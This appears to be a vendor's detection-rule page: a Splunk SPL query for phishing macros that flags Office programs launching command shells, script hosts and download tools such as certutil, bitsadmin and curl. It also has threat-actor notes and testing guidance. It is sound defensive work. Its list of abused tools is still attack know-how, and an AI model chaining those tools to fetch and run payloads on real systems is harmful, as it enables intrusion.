THREAT-InitialAccess-PhishingMacro Splunk · SPL

Detect Phishing Document Macro Execution and Initial Access in Splunk

Despite Microsoft's macro-blocking default settings (Block macros from the internet in Office 2016+, enabled by default since 2022), phishing document macro execution continues to be a primary initial access vector for SMBs. Attackers have adapted: moving to ISO/IMG file containers that strip the Mark-of-the-Web (MOTW) flag, using template injection attacks (DOTM/XLTM), abusing OneNote .one files (dropped in 2023 but resurfaced with .onepkg), and targeting users who have manually disabled macro blocking via Group Policy misconfiguration or social engineering ('Enable content to view this document'). QakBot successors (Pikabot, DarkGate), TA577, and Lazarus Group are documented using this technique against UK SMBs. NCSC 2025 advisory noted macro-based attacks persist in 40% of SMB ransomware intrusions due to inadequate macro restrictions.

MITRE ATT&CK

Tactic
Initial Access Execution

SPL Detection Query

Splunk (SPL)
spl 
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(
  ParentImage IN ("*\\winword.exe", "*\\excel.exe", "*\\powerpnt.exe",
                  "*\\outlook.exe", "*\\onenote.exe", "*\\mspub.exe")
  AND Image IN ("*\\cmd.exe", "*\\powershell.exe", "*\\pwsh.exe",
                "*\\mshta.exe", "*\\wscript.exe", "*\\cscript.exe",
                "*\\regsvr32.exe", "*\\rundll32.exe", "*\\certutil.exe",
                "*\\bitsadmin.exe", "*\\curl.exe", "*\\schtasks.exe")
)
| eval ThreatType="Macro_SuspiciousChildProcess"
| eval HighRisk=if(
    match(Image, "(?i)(mshta|cscript|wscript|regsvr32|certutil|bitsadmin)"),
    "YES", "NO"
  )
| eval RiskScore=if(HighRisk="YES", 90, 75)
| eval ThreatActors="QakBot successor, Emotet, TA577, Lazarus"
| stats count AS Events,
        values(Image) AS ChildProcesses,
        values(CommandLine) AS CommandLines,
        max(RiskScore) AS MaxRisk
  BY host, User, ParentImage, _time span=1h
| sort - MaxRisk
high severity high confidence

SPL phishing macro detection via Sysmon. Monitors for Office application parent processes spawning command interpreter or scripting host children — the definitive malicious macro execution indicator.

Data Sources

Sysmon via Windows Event Log

Required Sourcetypes

XmlWinEventLog:Microsoft-Windows-Sysmon/Operational

False Positives & Tuning

  • Legitimate Office macros invoking cmd for file operations
  • Developer testing of VBA automation
Download portable Sigma rule (.yml)

Other platforms for THREAT-InitialAccess-PhishingMacro

Microsoft Sentinel (KQL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 1 adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Office Macro Child Process Simulation (Excel)

    Expected signal: Sysmon Event ID 1: Excel.exe spawning cmd.exe. Parent process chain: explorer.exe > excel.exe > cmd.exe.

Last updated: 2026-04-25 Research depth: deep
References (6)

Unlock Pro Content

Get the full detection package for THREAT-InitialAccess-PhishingMacro including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1566.001Spearphishing Attachment

Related Techniques

T1566.001Spearphishing AttachmentT1059.005Visual BasicT1204.002Malicious FileT1027.006HTML SmugglingT1553.005Mark-of-the-Web BypassT1547.001Registry Run Keys / Startup Folder

Same Tactic: Initial Access

Popular Detections